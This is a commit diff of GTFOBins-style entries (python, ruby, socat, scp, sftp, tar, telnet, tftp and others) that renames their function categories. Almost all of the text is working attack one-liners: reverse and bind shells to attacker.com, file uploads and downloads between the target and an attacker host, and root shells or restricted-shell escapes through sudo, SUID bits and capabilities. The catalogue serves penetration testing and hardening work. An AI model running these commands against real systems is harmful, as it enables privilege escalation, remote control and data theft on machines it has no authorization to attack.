pty.spawn("/bin/sh")' pty.spawn("/bin/sh")'
upload: file-upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: | code: |
export URL=http://attacker.com/ export URL=http://attacker.com/
@@ -28,7 +28,7 @@ functions:
if sys.version_info.major == 3: import http.server as s, socketserver as ss if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'
download: file-download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
@@ -41,12 +41,12 @@ functions:
- code: python -c 'open("file_to_write","w+").write("DATA")' - code: python -c 'open("file_to_write","w+").write("DATA")'
file-read: file-read:
- code: python -c 'print(open("file_to_read").read())' - code: python -c 'print(open("file_to_read").read())'
load-library: library-load:
- code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' - code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
suid-enabled: suid:
- code: ./python -c 'import os; os.system("/bin/sh -p")' - code: ./python -c 'import os; os.system("/bin/sh -p")'
sudo-enabled: sudo:
- code: sudo python -c 'import os; os.system("/bin/sh")' - code: sudo python -c 'import os; os.system("/bin/sh")'
capabilities-enabled: capabilities:
- code: ./python -c 'import os; os.setuid(0); os.system("/bin/sh")' - code: ./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
--- ---

6
_gtfobins/rlwrap.md
View File

@@ -1,14 +1,14 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: rlwrap /bin/sh - code: rlwrap /bin/sh
file-write: file-write:
- description: This adds timestamps to the output file. This relies on the external `echo` command. - description: This adds timestamps to the output file. This relies on the external `echo` command.
code: | code: |
LFILE=file_to_write LFILE=file_to_write
rlwrap -l "$LFILE" echo DATA rlwrap -l "$LFILE" echo DATA
suid-enabled: suid:
- code: ./rlwrap -H /dev/null /bin/sh -p - code: ./rlwrap -H /dev/null /bin/sh -p
sudo-enabled: sudo:
- code: sudo rlwrap /bin/sh - code: sudo rlwrap /bin/sh
--- ---

6
_gtfobins/rpm.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}' - code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled: suid:
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
sudo-enabled: sudo:
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
--- ---

6
_gtfobins/rpmquery.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}' - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled: suid:
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}' - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
sudo-enabled: sudo:
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}' - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
--- ---

6
_gtfobins/rsync.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null - code: rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
sudo-enabled: sudo:
- code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null - code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
suid-enabled: suid:
- code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null - code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
--- ---

14
_gtfobins/ruby.md
View File

@@ -1,19 +1,19 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: ruby -e 'exec "/bin/sh"' - code: ruby -e 'exec "/bin/sh"'
reverse-shell-interactive: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
upload: file-upload:
- description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later. - description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
code: | code: |
export LPORT=8888 export LPORT=8888
ruby -run -e httpd . -p $LPORT ruby -run -e httpd . -p $LPORT
download: file-download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@@ -25,10 +25,10 @@ functions:
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }' - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }'
file-read: file-read:
- code: ruby -e 'puts File.read("file_to_read")' - code: ruby -e 'puts File.read("file_to_read")'
load-library: library-load:
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
sudo-enabled: sudo:
- code: sudo ruby -e 'exec "/bin/sh"' - code: sudo ruby -e 'exec "/bin/sh"'
capabilities-enabled: capabilities:
- code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"' - code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'
--- ---

10
_gtfobins/scp.md
View File

@@ -1,30 +1,30 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF" chmod +x "$TF"
scp -S $TF x y: scp -S $TF x y:
upload: file-upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
RPATH=user@attacker.com:~/file_to_save RPATH=user@attacker.com:~/file_to_save
LPATH=file_to_send LPATH=file_to_send
scp $LFILE $RPATH scp $LFILE $RPATH
download: file-download:
- description: Fetch a remote file from a SSH server. - description: Fetch a remote file from a SSH server.
code: | code: |
RPATH=user@attacker.com:~/file_to_get RPATH=user@attacker.com:~/file_to_get
LFILE=file_to_save LFILE=file_to_save
scp $RPATH $LFILE scp $RPATH $LFILE
sudo-enabled: sudo:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF" chmod +x "$TF"
sudo scp -S $TF x y: sudo scp -S $TF x y:
suid-limited: limited-suid:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF echo 'sh 0<&2 1>&2' > $TF

8
_gtfobins/sed.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- description: GNU version only. Also, this requires `bash`. - description: GNU version only. Also, this requires `bash`.
code: sed -n '1e exec sh 1>&0' /etc/hosts code: sed -n '1e exec sh 1>&0' /etc/hosts
execute-non-interactive: command:
- description: GNU version only. - description: GNU version only.
code: sed -n "1e id" /etc/hosts code: sed -n "1e id" /etc/hosts
file-write: file-write:
@@ -14,11 +14,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sed '' "$LFILE" sed '' "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./sed -e '' "$LFILE" ./sed -e '' "$LFILE"
sudo-enabled: sudo:
- description: GNU version only. Also, this requires `bash`. - description: GNU version only. Also, this requires `bash`.
code: sudo sed -n '1e exec sh 1>&0 /etc/hosts code: sudo sed -n '1e exec sh 1>&0 /etc/hosts
--- ---

6
_gtfobins/setarch.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: setarch $(arch) /bin/sh - code: setarch $(arch) /bin/sh
suid-enabled: suid:
- code: ./setarch $(arch) /bin/sh -p - code: ./setarch $(arch) /bin/sh -p
sudo-enabled: sudo:
- code: sudo setarch $(arch) /bin/sh - code: sudo setarch $(arch) /bin/sh
--- ---

8
_gtfobins/sftp.md
View File

@@ -1,23 +1,23 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
HOST=user@attacker.com HOST=user@attacker.com
sftp $HOST sftp $HOST
!/bin/sh !/bin/sh
upload: file-upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
RHOST=user@attacker.com RHOST=user@attacker.com
sftp $RHOST sftp $RHOST
put file_to_send file_to_save put file_to_send file_to_save
download: file-download:
- description: Fetch a remote file from a SSH server. - description: Fetch a remote file from a SSH server.
code: | code: |
RHOST=user@attacker.com RHOST=user@attacker.com
sftp $RHOST sftp $RHOST
get file_to_get file_to_save get file_to_get file_to_save
sudo-enabled: sudo:
- code: | - code: |
HOST=user@attacker.com HOST=user@attacker.com
sudo sftp $HOST sudo sftp $HOST

4
_gtfobins/shuf.md
View File

@@ -5,11 +5,11 @@ functions:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
shuf -e DATA -o "$LFILE" shuf -e DATA -o "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
./shuf -e DATA -o "$LFILE" ./shuf -e DATA -o "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
sudo shuf -e DATA -o "$LFILE" sudo shuf -e DATA -o "$LFILE"

4
_gtfobins/smbclient.md
View File

@@ -1,11 +1,11 @@
--- ---
description: A valid SMB/CIFS server must be available. description: A valid SMB/CIFS server must be available.
functions: functions:
execute-interactive: shell:
- code: | - code: |
smbclient \\ip\share smbclient \\ip\share
!/bin/sh !/bin/sh
sudo-enabled: sudo:
- code: | - code: |
sudo smbclient \\ip\share sudo smbclient \\ip\share
!/bin/sh !/bin/sh

8
_gtfobins/socat.md
View File

@@ -1,23 +1,23 @@
--- ---
functions: functions:
reverse-shell-interactive: reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
bind-shell-interactive: bind-shell:
- description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell. - description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
code: | code: |
LPORT=12345 LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
sudo-enabled: sudo:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
suid-limited: limited-suid:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com

4
_gtfobins/sort.md
View File

@@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sort -m "$LFILE" sort -m "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./sort -m "$LFILE" ./sort -m "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo sort -m "$LFILE" sudo sort -m "$LFILE"

6
_gtfobins/sqlite3.md
View File

@@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: sqlite3 /dev/null '.shell /bin/sh' - code: sqlite3 /dev/null '.shell /bin/sh'
file-write: file-write:
- code: | - code: |
@@ -14,8 +14,8 @@ functions:
.import $LFILE t .import $LFILE t
SELECT * FROM t; SELECT * FROM t;
EOF EOF
sudo-enabled: sudo:
- code: sudo sqlite3 /dev/null '.shell /bin/sh' - code: sudo sqlite3 /dev/null '.shell /bin/sh'
suid-limited: limited-suid:
- code: "./sqlite3 /dev/null '.shell /bin/sh'" - code: "./sqlite3 /dev/null '.shell /bin/sh'"
--- ---

8
_gtfobins/ssh.md
View File

@@ -1,18 +1,18 @@
--- ---
functions: functions:
execute-interactive: shell:
- description: Reconnecting may help bypassing restricted shells. - description: Reconnecting may help bypassing restricted shells.
code: ssh localhost $SHELL --noprofile --norc code: ssh localhost $SHELL --noprofile --norc
- description: Spawn interactive shell through ProxyCommand option. - description: Spawn interactive shell through ProxyCommand option.
code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x
upload: file-upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
HOST=user@attacker.com HOST=user@attacker.com
RPATH=file_to_save RPATH=file_to_save
LPATH=file_to_send LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH ssh $HOST "cat > $RPATH" < $LPATH
download: file-download:
- description: Fetch a remote file from a SSH server. - description: Fetch a remote file from a SSH server.
code: | code: |
HOST=user@attacker.com HOST=user@attacker.com
@@ -24,7 +24,7 @@ functions:
code: | code: |
LFILE=file_to_read LFILE=file_to_read
ssh -F $LFILE localhost ssh -F $LFILE localhost
sudo-enabled: sudo:
- description: Spawn interactive root shell through ProxyCommand option. - description: Spawn interactive root shell through ProxyCommand option.
code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
--- ---

6
_gtfobins/stdbuf.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: stdbuf -i0 /bin/sh - code: stdbuf -i0 /bin/sh
suid-enabled: suid:
- code: ./stdbuf -i0 /bin/sh -p - code: ./stdbuf -i0 /bin/sh -p
sudo-enabled: sudo:
- code: sudo stdbuf -i0 /bin/sh - code: sudo stdbuf -i0 /bin/sh
--- ---

6
_gtfobins/strace.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: strace -o /dev/null /bin/sh - code: strace -o /dev/null /bin/sh
suid-enabled: suid:
- code: ./strace -o /dev/null /bin/sh -p - code: ./strace -o /dev/null /bin/sh -p
sudo-enabled: sudo:
- code: sudo strace -o /dev/null /bin/sh - code: sudo strace -o /dev/null /bin/sh
--- ---

4
_gtfobins/tail.md
View File

@@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
tail -c1G "$LFILE" tail -c1G "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./tail -c1G "$LFILE" ./tail -c1G "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo tail -c1G "$LFILE" sudo tail -c1G "$LFILE"

8
_gtfobins/tar.md
View File

@@ -1,8 +1,8 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
execute-non-interactive: command:
- description: This only works for GNU tar. - description: This only works for GNU tar.
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"' code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
file-write: file-write:
@@ -17,8 +17,8 @@ functions:
code: | code: |
LFILE=file_to_read LFILE=file_to_read
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"' tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
sudo-enabled: sudo:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
suid-limited: limited-suid:
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
--- ---

6
_gtfobins/taskset.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: taskset 1 /bin/sh - code: taskset 1 /bin/sh
suid-enabled: suid:
- code: ./taskset 1 /bin/sh -p - code: ./taskset 1 /bin/sh -p
sudo-enabled: sudo:
- code: sudo taskset 1 /bin/sh - code: sudo taskset 1 /bin/sh
--- ---

8
_gtfobins/tclsh.md
View File

@@ -1,20 +1,20 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
tclsh tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr exec /bin/sh <@stdin >@stdout 2>@stderr
reverse-shell-non-interactive: non-interactive-reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
suid-enabled: suid:
- code: | - code: |
./tclsh ./tclsh
exec /bin/sh -p <@stdin >@stdout 2>@stderr exec /bin/sh -p <@stdin >@stdout 2>@stderr
sudo-enabled: sudo:
- code: | - code: |
sudo tclsh sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr exec /bin/sh <@stdin >@stdout 2>@stderr

4
_gtfobins/tcpdump.md
View File

@@ -1,14 +1,14 @@
--- ---
description: These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background. description: These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.
functions: functions:
execute-non-interactive: command:
- code: | - code: |
COMMAND='id' COMMAND='id'
TF=$(mktemp) TF=$(mktemp)
echo "$COMMAND" > $TF echo "$COMMAND" > $TF
chmod +x $TF chmod +x $TF
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
sudo-enabled: sudo:
- code: | - code: |
COMMAND='id' COMMAND='id'
TF=$(mktemp) TF=$(mktemp)

4
_gtfobins/tee.md
View File

@@ -5,11 +5,11 @@ functions:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo DATA | ./tee -a "$LFILE" echo DATA | ./tee -a "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo DATA | ./tee -a "$LFILE" echo DATA | ./tee -a "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo DATA | sudo tee -a "$LFILE" echo DATA | sudo tee -a "$LFILE"

8
_gtfobins/telnet.md
View File

@@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- description: BSD version only. Needs to be connected first. - description: BSD version only. Needs to be connected first.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
@@ -8,14 +8,14 @@ functions:
telnet $RHOST $RPORT telnet $RHOST $RPORT
^] ^]
!/bin/sh !/bin/sh
reverse-shell-interactive: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
TF=$(mktemp -u) TF=$(mktemp -u)
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
sudo-enabled: sudo:
- description: BSD version only. Needs to be connected first. - description: BSD version only. Needs to be connected first.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
@@ -23,7 +23,7 @@ functions:
sudo telnet $RHOST $RPORT sudo telnet $RHOST $RPORT
^] ^]
!/bin/sh !/bin/sh
suid-limited: limited-suid:
- description: BSD version only. Needs to be connected first. - description: BSD version only. Needs to be connected first.
code: | code: |
RHOST=attacker.com RHOST=attacker.com

8
_gtfobins/tftp.md
View File

@@ -1,24 +1,24 @@
--- ---
functions: functions:
upload: file-upload:
- description: Send local file to a TFTP server. - description: Send local file to a TFTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
tftp $RHOST tftp $RHOST
put file_to_send put file_to_send
download: file-download:
- description: Fetch a remote file from a TFTP server. - description: Fetch a remote file from a TFTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
tftp $RHOST tftp $RHOST
get file_to_get get file_to_get
suid-enabled: suid:
- description: Send local file to a TFTP server. - description: Send local file to a TFTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
./tftp $RHOST ./tftp $RHOST
put file_to_send put file_to_send
sudo-enabled: sudo:
- description: Send local file to a TFTP server. - description: Send local file to a TFTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com

6
_gtfobins/time.md
View File

@@ -1,10 +1,10 @@
--- ---
description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path. description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
functions: functions:
execute-interactive: shell:
- code: /usr/bin/time /bin/sh - code: /usr/bin/time /bin/sh
suid-enabled: suid:
- code: ./time /bin/sh -p - code: ./time /bin/sh -p
sudo-enabled: sudo:
- code: sudo /usr/bin/time /bin/sh - code: sudo /usr/bin/time /bin/sh
--- ---

6
_gtfobins/timeout.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: timeout 7d /bin/sh - code: timeout 7d /bin/sh
suid-enabled: suid:
- code: ./timeout 7d /bin/sh -p - code: ./timeout 7d /bin/sh -p
sudo-enabled: sudo:
- code: sudo timeout --foreground 7d /bin/sh - code: sudo timeout --foreground 7d /bin/sh
--- ---

4
_gtfobins/ul.md
View File

@@ -5,11 +5,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
ul "$LFILE" ul "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./ul "$LFILE" ./ul "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo ul "$LFILE" sudo ul "$LFILE"

4
_gtfobins/unexpand.md
View File

@@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
unexpand -t99999999 "$LFILE" unexpand -t99999999 "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./unexpand -t99999999 "$LFILE" ./unexpand -t99999999 "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo unexpand -t99999999 "$LFILE" sudo unexpand -t99999999 "$LFILE"

4
_gtfobins/uniq.md
View File

@@ -5,11 +5,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
uniq "$LFILE" uniq "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./uniq "$LFILE" ./uniq "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo uniq "$LFILE" sudo uniq "$LFILE"

6
_gtfobins/unshare.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: unshare /bin/sh - code: unshare /bin/sh
suid-enabled: suid:
- code: ./unshare -r /bin/sh - code: ./unshare -r /bin/sh
sudo-enabled: sudo:
- code: sudo unshare /bin/sh - code: sudo unshare /bin/sh
--- ---

Some files were not shown because too many files have changed in this diff Show More